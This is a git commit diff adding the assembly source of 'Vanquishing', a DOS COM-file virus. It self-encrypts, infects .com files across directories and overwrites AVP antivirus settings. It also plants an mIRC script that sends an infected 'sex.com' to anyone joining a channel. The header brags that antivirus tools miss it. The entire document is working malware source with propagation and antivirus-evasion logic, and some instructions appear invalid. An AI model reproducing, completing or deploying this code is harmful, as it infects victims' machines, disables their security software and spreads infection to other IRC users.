Add files via upload

2026-06-16 15:59:24 +00:00 · 2021-01-12 18:04:54 -06:00
parent 3e7d2e8262
commit 6bf46a48b9
99 changed files with 46230 additions and 0 deletions
@@ -0,0 +1,266 @@
+;  Vanquishing by Arsonic
+;  Type: Direct Action Appending COM infector
+;
+;  Notes: Attempts to Spread VIA Irc Clients by modifying the Script.ini
+;  to send a file called SEX.COM to everyone who joins a Channel the infected
+;  person is currently on.
+;
+;  Attempts to patch the avp antivirus.
+;
+;
+;  Detection Stats:
+;  AVP:  NOTHING
+;FPROT:  NOTHING
+; TBAV:  NOTHING
+;
+db 0e9h,0,0
+VANQUISHING_START:
+
+call DELTA
+DELTA:
+pop bp
+sub bp,offset DELTA
+
+lea si,[bp+ENCRYPTION_START]
+mov di,si
+mov cx,VANQUISHING_END - ENCRYPTION_START
+call CRYPTO
+jmp ENCRYPTION_START
+
+CRYPTO:
+lodsb
+ror al,3
+not al
+xor al,byte ptr [bp+KEY]
+not al
+rol al,3
+stosb
+loop CRYPTO
+ret
+
+KEY db 0
+
+ENCRYPTION_START:
+mov di,100h
+mov cx,3
+cmp byte ptr [bp+BUFF_STORE],1
+jne BUFF_SEC
+lea si,[bp+BUFF_THREE_ONE]
+jmp RESTORE_BUFFER
+BUFF_SEC:
+lea si,[bp+BUFF_THREE_TWO]
+RESTORE_BUFFER:
+rep movsb
+
+mov ah,3ch
+xor cx,cx      
+lea dx,[bp+AVPSET]              
+int 21h
+jc FIND_FIRST
+
+xchg bx,ax                
+
+mov ah,40h                
+lea dx,[bp+Patch_Start]         
+mov cx,Patch_End - Patch_Start  
+int 21h
+
+mov ah,3eh                
+int 21h
+
+FIND_FIRST:
+mov ah,4dh
+lea dx,[bp+FILEMASK]
+FIND_NEXT:
+call INC_CALL
+int 21h
+jnc INFECT
+
+mov ah,3bh
+lea dx,[bp+DOTDOT]
+int 21h
+jnc FIND_FIRST
+
+mov ah,3ch
+lea dx,[bp+Script]
+xor cx,cx
+int 21h
+jc CLOSE
+
+xchg bx,ax          
+
+mov ah,40h          
+lea dx,[bp+SCRIPT_LINE_START]
+mov cx,SCRIPT_LINE_END - SCRIPT_LINE_START
+int 21h
+
+mov ah,3eh         
+int 21h
+
+mov ah,3ch
+lea dx,[bp+SEX]
+xor cx,cx
+int 21h
+
+xchg bx,ax
+
+mov ax,4200h
+xor cx,cx
+xor dx,dx
+int 21h
+
+mov ah,40h
+lea dx,[bp+BYTES_START]
+mov cx,BYTES_END - BYTES_START
+int 21h
+
+mov ax,4202h
+xor cx,cx
+xor dx,dx
+int 21h
+
+mov ah,40h
+lea dx,[bp+VANQUISHING_START]
+mov cx,VANQUISHING_END - VANQUISHING_START
+int 21h
+
+mov ah,3eh
+int 21h
+
+CLOSE:
+mov di,100h
+jmp di
+
+INFECT:
+mov ax,4301h
+mov dx,9eh
+xor cx,cx
+int 21h
+
+mov ax,3d02h
+mov dx,9eh
+int 21h
+
+xchg bx,ax
+
+mov ah,3fh
+lea dx,[bp+TEMP_ONE]
+mov cx,3
+int 21h
+
+mov ax,word ptr[80h + 1ah]      
+sub ax,VANQUISHING_END - VANQUISHING_START + 3  
+cmp ax,word ptr[bp+TEMP_ONE+1]    
+je CLOSE_FILE         
+
+mov ax,word ptr[80h + 1ah]      
+sub ax,3                
+mov word ptr[bp+TEMP_TWO+1],ax 
+
+mov ax,4200h
+xor cx,cx
+xor dx,dx
+int 21h
+
+mov ah,3fh
+lea dx,[bp+TEMP_TWO]
+mov cx,3
+call INC_CALL
+int 21h
+
+call RANDOM_LOC
+
+mov ax,4202h
+xor cx,cx
+xor dx,dx
+int 21h
+
+call SNAG_KEY
+
+mov ah,3fh
+lea dx,[bp+VANQUISHING_START]
+mov cx,ENCRYPTION_START - VANQUISHING_START
+call INC_CALL
+int 21h
+
+lea si,[bp+ENCRYPTION_START]
+lea di,[bp+VANQUISHING_END]
+mov cx,VANQUISHING_END - ENCRYPTION_START
+call CRYPTO
+
+mov ah,3fh
+lea dx,[bp+VANQUISHING_END]
+mov cx,VANQUISHING_END - ENCRYPTION_START
+call INC_CALL
+int 21h
+
+CLOSE_FILE:
+mov ah,3eh
+int 21h
+
+mov ah,4eh
+jmp FIND_NEXT
+
+INC_CALL:
+inc ah
+ret
+
+SNAG_KEY:
+in al,40h
+mov byte ptr [bp+KEY],al
+ret
+
+RANDOM_LOC:
+mov ah,2ch
+int 21h
+cmp dh,30
+ja SEC_LOC
+FIR_LOC:
+mov byte ptr [bp+BUFF_THREE_ONE],byte ptr [bp+TEMP_TWO]
+mov byte ptr [bp+BUFF_THREE_TWO],byte ptr [bp+TEMP_ONE]
+mov byte ptr [bp+TEMP_TWO],0
+mov byte ptr [bp+TEMP_ONE],0
+mov byte ptr [bp+BUFF_STORE],2
+ret
+SEC_LOC:
+mov byte ptr [bp+BUFF_THREE_ONE],byte ptr [bp+TEMP_ONE]
+mov byte ptr [bp+BUFF_THREE_TWO],byte ptr [bp+TEMP_TWO]
+mov byte ptr [bp+TEMP_TWO],0
+mov byte ptr [bp+TEMP_ONE],0
+mov byte ptr [bp+BUFF_STORE],1
+ret
+
+SCRIPT_LINE_START:
+db '[script]',13,10
+db 'n0=on 1:JOIN:#:/dcc send $nick C:\mirc\sex.com',13,10
+SCRIPT_LINE_END:
+
+PATCH_START:
+db 'KERNEL.AVC',13,10
+db 'TROJAN.AVC',13,10
+db 'UNPACK.AVC',13,10
+db 'EXTRACT.AVC',13,10
+db 'MAIL.AVC',13,10
+db 'EICAR.AVC',13,10
+db 'MACRO.AVC',13,10
+PATCH_END:
+
+BYTES_START:
+nop
+nop
+nop
+BYTES_END:
+
+AVPSET DB 'c:\avp\avp.set',0
+BUFF_THREE_ONE db 0e9h,0,0
+BUFF_THREE_TWO db 0cdh,20h,0
+FILEMASK db '*.com',0
+BUFF_STORE db 2
+TEMP_ONE db 0
+TEMP_TWO db 0
+DOTDOT db '..',0
+VANQ db ' [VANQUISHING] [BY ARSONIC] [CODEBREAKERS 98] '
+SEX  db 'c:\mirc\sex.com',0
+SCRIPT db 'c:\mirc\script.ini',0
+VANQUISHING_END:
+